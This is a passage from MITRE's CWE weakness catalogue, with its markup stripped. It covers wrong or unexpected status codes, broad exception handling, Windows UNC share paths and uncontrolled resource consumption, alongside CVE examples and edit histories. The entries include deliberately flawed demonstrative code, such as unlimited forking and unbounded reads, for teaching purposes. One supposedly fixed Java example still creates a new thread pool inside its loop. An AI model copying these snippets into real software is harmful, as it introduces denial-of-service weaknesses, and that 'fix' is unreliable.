+ + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Missing Error Status Code + Failure to Report Error in Status Code + + + + A function or operation returns an incorrect return value or status code that does not indicate an error, but causes the product to modify its behavior based on the incorrect result. + This can lead to unpredictable behavior. If the function is used to make security-critical decisions or provide security-critical information, then the wrong status code can cause the product to assume that an action is safe, even when it is not. + + + + + + + + + + Implementation + + + + + Integrity + Other + Unexpected State + Alter Execution Logic + This weakness could place the system in a state that could lead unexpected logic to be executed or other unintended behaviors. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + In the following example, an HTTP 404 status code is returned in the event of an IOException encountered in a Java servlet. A 404 code is typically meant to indicate a non-existent resource and would be somewhat misleading in this case. + + try { + + + // something that might throw IOException + ... + } catch (IOException ioe) {response.sendError(SC_NOT_FOUND);} + + + + + + CVE-2003-1132 + DNS server returns wrong response code for non-existent AAAA record, which effectively says that the domain is inaccessible. + https://www.cve.org/CVERecord?id=CVE-2003-1132 + + + CVE-2001-1509 + Hardware-specific implementation of system call causes incorrect results from geteuid. + https://www.cve.org/CVERecord?id=CVE-2001-1509 + + + CVE-2001-1559 + System call returns wrong value, leading to a resultant NULL dereference. + https://www.cve.org/CVERecord?id=CVE-2001-1559 + + + CVE-2014-1266 + chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). + https://www.cve.org/CVERecord?id=CVE-2014-1266 + + + + + Wrong Status Code + + + SFP6 + Incorrect Exception Behavior + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can be primary or resultant, but it is probably most often primary to other issues. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Wrong Status Code + + + + The product does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the product. + + + + + + + + + Implementation + + + + + Integrity + Other + Unexpected State + Alter Execution Logic + + + + + CVE-2004-1395 + Certain packets (zero byte and other lengths) cause a recvfrom call to produce an unexpected return code that causes a server's listening loop to exit. + https://www.cve.org/CVERecord?id=CVE-2004-1395 + + + CVE-2002-2124 + Unchecked return code from recv() leads to infinite loop. + https://www.cve.org/CVERecord?id=CVE-2002-2124 + + + CVE-2005-2553 + Kernel function does not properly handle when a null is returned by a function call, causing it to call another function that it shouldn't. + https://www.cve.org/CVERecord?id=CVE-2005-2553 + + + CVE-2005-1858 + Memory not properly cleared when read() function call returns fewer bytes than expected. + https://www.cve.org/CVERecord?id=CVE-2005-1858 + + + CVE-2000-0536 + Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname. + https://www.cve.org/CVERecord?id=CVE-2000-0536 + + + CVE-2001-0910 + Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname. + https://www.cve.org/CVERecord?id=CVE-2001-0910 + + + CVE-2004-2371 + Game server doesn't check return values for functions that handle text strings and associated size values. + https://www.cve.org/CVERecord?id=CVE-2004-2371 + + + CVE-2005-1267 + Resultant infinite loop when function call returns -1 value. + https://www.cve.org/CVERecord?id=CVE-2005-1267 + + + + + Unexpected Status Code or Return Value + + + SFP4 + Unchecked Status Condition + + + EXP00-PL + Do not return undef + Imprecise + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Usually primary, but can be resultant from issues such as behavioral change or API abuse. This can produce resultant vulnerabilities. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer. + + Programmers typically catch NullPointerException under three circumstances: + + The program contains a null pointer dereference. Catching the resulting exception was easier than fixing the underlying problem. + The program explicitly throws a NullPointerException to signal an error condition. + The code is part of a test harness that supplies unexpected input to the classes under test. + + Of these three circumstances, only the last is acceptable. + + + + + + + + + + + Implementation + + + + + Availability + DoS: Resource Consumption (CPU) + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Implementation + Do not extensively rely on catching exceptions (especially for validating user input) to handle errors. Handling exceptions can decrease the performance of an application. + + + + + The following code mistakenly catches a NullPointerException. + + try { + + mysteryMethod(); + + } catch (NullPointerException npe) { + } + + + + + + Catching NullPointerException + + + ERR08-J + Do not catch NullPointerException or any of its ancestors + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Catch NullPointerException + + + + Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities. + Multiple catch blocks can get ugly and repetitive, but "condensing" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of a language's typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention. + + + + + + + + + + + + + + Implementation + + + + + Non-Repudiation + Other + Hide Activities + Alter Execution Logic + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following code excerpt handles three types of exceptions in an identical fashion. + + try {doExchange();}catch (IOException e) {logger.error("doExchange failed", e);}catch (InvocationTargetException e) { + + logger.error("doExchange failed", e); + }catch (SQLException e) { + + logger.error("doExchange failed", e); + } + + At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows: + + try {doExchange();}catch (Exception e) {logger.error("doExchange failed", e);} + + However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer's intent. + + + + + Overly-Broad Catch Block + + + SFP5 + Ambiguous Exception Type + + + ASCSM-CWE-396 + + + ASCRM-CWE-396 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-09-24 + Removed C from Applicable_Platforms + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Applicable_Platforms, Description, Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Drew Buttner + MITRE + 2023-03-06 + Suggested additional Applicable_Platforms and modification to extended description. + + Overly-Broad Catch Block + + + + Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities. + Declaring a method to throw Exception or Throwable makes it difficult for callers to perform proper error handling and error recovery. Java's exception mechanism, for example, is set up to make it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system. + + + + + + + + + + + + + Implementation + + + + + Non-Repudiation + Other + Hide Activities + Alter Execution Logic + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following method throws three types of exceptions. + + public void doExchange() throws IOException, InvocationTargetException, SQLException {...} + + While it might seem tidier to write + + public void doExchange() throws Exception {...} + + doing so hampers the caller's ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement. + + + Early versions of C++ (C++98, C++03, C++11) included a feature known as Dynamic Exception Specification. This allowed functions to declare what type of exceptions it may throw. It is possible to declare a general class of exception to cover any derived exceptions that may be throw. + + int myfunction() throw(std::exception) {if (0) throw out_of_range();throw length_error();} + + In the example above, the code declares that myfunction() can throw an exception of type "std::exception" thus hiding details about the possible derived exceptions that could potentially be thrown. + + + + + Overly-Broad Throws Declaration + + + ERR07-J + Do not throw RuntimeException, Exception, or Throwable + + + SFP5 + Ambiguous Exception Type + + + ASCSM-CWE-397 + + + ASCRM-CWE-397 + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + For C++, this weakness only applies to C++98, C++03, and C++11. It relies on a feature known as Dynamic Exception Specification, which was part of early versions of C++ but was deprecated in C++11. It has been removed for C++17 and later. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-09-24 + Removed C from Applicable_Platforms + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Applicable_Platforms, Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Overly-Broad Throws Declaration + + + + The product accepts input that identifies a Windows UNC share ('\\UNC\share\name') that potentially redirects access to an unintended location or arbitrary file. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2001-0687 + FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\computername\sharename). + https://www.cve.org/CVERecord?id=CVE-2001-0687 + + + + + '\\UNC\share\name\' (Windows UNC share) + + + SFP16 + Path Traversal + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Windows UNC Share - '\\UNC\share\name\' + + + + The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. + + Limited resources include memory, file system storage, database connection pool entries, and CPU. If an attacker can trigger the allocation of these limited resources, but the number or size of the resources is not controlled, then the attacker could cause a denial of service that consumes all available resources. This would prevent valid users from accessing the product, and it could potentially have an impact on the surrounding environment. For example, a memory exhaustion attack against an application could slow down the application as well as its host operating system. + There are at least three distinct scenarios which can commonly lead to resource exhaustion: + + Lack of throttling for the number of allocated resources + Losing all references to a resource before reaching the shutdown stage + Not closing/returning a resource after processing + + Resource exhaustion problems are often result due to an incorrect implementation of the following situations: + + Error conditions and other exceptional circumstances. + Confusion over which part of the program is responsible for releasing the resource. + + + + + + + + + + + Resource Exhaustion + + + + + Operation + + + Architecture and Design + + + Implementation + + + High + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + The most common result of resource exhaustion is denial of service. The product may slow down, crash due to unhandled errors, or lock out legitimate users. + + + Access Control + Other + Bypass Protection Mechanism + Other + In some cases it may be possible to force the product to "fail open" in the event of resource exhaustion. The state of the product -- and possibly the security functionality - may then be compromised. + + + + + Automated Static Analysis + + Automated static analysis typically has limited utility in recognizing resource exhaustion problems, except for program-independent system resources such as files, sockets, and processes. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value. + Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day. + + Limited + + + Automated Dynamic Analysis + Certain automated dynamic analysis techniques may be effective in spotting resource exhaustion problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the product within a short time frame. + Moderate + + + Fuzzing + While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find resource exhaustion problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted product in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to handle resource exhaustion may be the cause. + Opportunistic + + + + + Architecture and Design + Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold. + + + Architecture and Design + + Mitigation of resource exhaustion attacks requires that the target system either: + + recognizes the attack and denies that user further access for a given amount of time, or + uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed. + + The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question. + The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker. + + + + Architecture and Design + Ensure that protocols have specific limits of scale placed on them. + + + Implementation + Ensure that all failures in resource allocation place the system into a safe posture. + + + + + The following example demonstrates the weakness. + + class Worker implements Executor { + ...public void execute(Runnable r) { + + try {...}catch (InterruptedException ie) { + + + // postpone response + Thread.currentThread().interrupt(); + } + } + public Worker(Channel ch, int nworkers) {...} + protected void activate() { + + Runnable loop = new Runnable() { + + public void run() { + + try {for (;;) {Runnable r = ...;r.run();}}catch (InterruptedException ie) {...} + } + };new Thread(loop).start(); + } + } + + There are no limits to runnables. Potentially an attacker could cause resource problems very quickly. + + + This code allocates a socket and forks each time it receives a new connection. + + sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {newsock=accept(sock, ...);printf("A connection has been accepted\n");pid = fork();} + + The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely. + + + In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket. + + int writeDataFromSocketToFile(char *host, int port){ + + char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port); + if (socket < 0) {printf("Unable to open socket connection");return(FAIL);}if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) { + if (openFileToWrite(filename) > 0) { + while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0){if (!(writeToFile(buffer) > 0))break; + } + }closeFile(); + }closeSocket(socket); + } + + This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients' ability to access the service. + + + In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array. + + + + /* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */ + int processMessage(char **message){ + char *body; + int length = getMessageLength(message[0]); + if (length > 0) {body = &message[1][0];processMessageBody(body);return(SUCCESS);}else {printf("Unable to process message; invalid message length");return(FAIL);} + } + + This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check + Also, consider changing the type from 'int' to 'unsigned int', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code. + + unsigned int length = getMessageLength(message[0]);if ((length > 0) && (length < MAX_LENGTH)) {...} + + + + In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket. + + public void acceptConnections() { + + try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);t.start();}serverSocket.close(); + + } catch (IOException ex) {...} + } + + In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources. + The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated. + + public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;... + public void acceptConnections() { + + try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);}serverSocket.close(); + + } catch (IOException ex) {...} + } + + + + In the following example, the serve function receives an http request and an http response writer. It reads the entire request body. + + func serve(w http.ResponseWriter, r *http.Request) { + + var body []byte + if r.Body != nil { + + if data, err := io.ReadAll(r.Body); err == nil { + + body = data + + } + } + } + + Because ReadAll is defined to read from src until EOF, it does not treat an EOF from Read as an error to be reported. This example creates a situation where the length of the body supplied can be very large and will consume excessive memory, exhausting system resources. This can be avoided by ensuring the body does not exceed a predetermined length of bytes. + MaxBytesReader prevents clients from accidentally or maliciously sending a large request and wasting server resources. If possible, the code could be changed to tell ResponseWriter to close the connection after the limit has been reached. + + func serve(w http.ResponseWriter, r *http.Request) { + + var body []byte + const MaxRespBodyLength = 1e6 + if r.Body != nil { + + r.Body = http.MaxBytesReader(w, r.Body, MaxRespBodyLength) + if data, err := io.ReadAll(r.Body); err == nil { + + body = data + + } + } + } + + + + + + CVE-2022-21668 + Chain: Python library does not limit the resources used to process images that specify a very large number of bands (CWE-1284), leading to excessive memory consumption (CWE-789) or an integer overflow (CWE-190). + https://www.cve.org/CVERecord?id=CVE-2022-21668 + + + CVE-2020-7218 + Go-based workload orchestrator does not limit resource usage with unauthenticated connections, allowing a DoS by flooding the service + https://www.cve.org/CVERecord?id=CVE-2020-7218 + + + CVE-2020-3566 + Resource exhaustion in distributed OS because of "insufficient" IGMP queue management, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-3566 + + + CVE-2009-2874 + Product allows attackers to cause a crash via a large number of connections. + https://www.cve.org/CVERecord?id=CVE-2009-2874 + + + CVE-2009-1928 + Malformed request triggers uncontrolled recursion, leading to stack exhaustion. + https://www.cve.org/CVERecord?id=CVE-2009-1928 + + + CVE-2009-2858 + Chain: memory leak (CWE-404) leads to resource exhaustion. + https://www.cve.org/CVERecord?id=CVE-2009-2858 + + + CVE-2009-2726 + Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption. + https://www.cve.org/CVERecord?id=CVE-2009-2726 + + + CVE-2009-2540 + Large integer value for a length property in an object causes a large amount of memory allocation. + https://www.cve.org/CVERecord?id=CVE-2009-2540 + + + CVE-2009-2299 + Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data. + https://www.cve.org/CVERecord?id=CVE-2009-2299 + + + CVE-2009-2054 + Product allows exhaustion of file descriptors when processing a large number of TCP packets. + https://www.cve.org/CVERecord?id=CVE-2009-2054 + + + CVE-2008-5180 + Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created. + https://www.cve.org/CVERecord?id=CVE-2008-5180 + + + CVE-2008-2121 + TCP implementation allows attackers to consume CPU and prevent new connections using a TCP SYN flood attack. + https://www.cve.org/CVERecord?id=CVE-2008-2121 + + + CVE-2008-2122 + Port scan triggers CPU consumption with processes 